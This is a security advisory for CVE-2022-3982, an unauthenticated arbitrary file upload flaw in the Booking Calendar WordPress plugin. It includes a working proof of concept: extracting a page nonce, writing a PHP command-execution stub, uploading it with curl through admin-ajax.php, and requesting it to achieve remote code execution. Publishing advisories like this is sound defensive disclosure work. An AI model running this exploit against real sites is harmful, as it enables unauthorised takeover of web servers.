Booking Calendar < 3.2.2 – Unauthenticated Arbitrary File Upload | CVE 2022-3982

Description

The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE

Proof of Concept

1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:

echo '<?php passthru("id"); ?>' > /tmp/poc.php

4. Upload the payload with cURL, with the previously extracted nonce:

curl -i https://example.com/wp-admin/admin-ajax.php \
    -F 'action=wpdevart_form_ajax' \
    -F 'wpdevart_id=x' \
    -F 'wpdevart_nonce=<NONCE HERE>' \
    -F 'wpdevart_data={"wpdevart-submit":"X"}' \
    -F 'wpdevart-submit=1' \
    -F 'file=@/tmp/poc.php' 

5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>"

curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php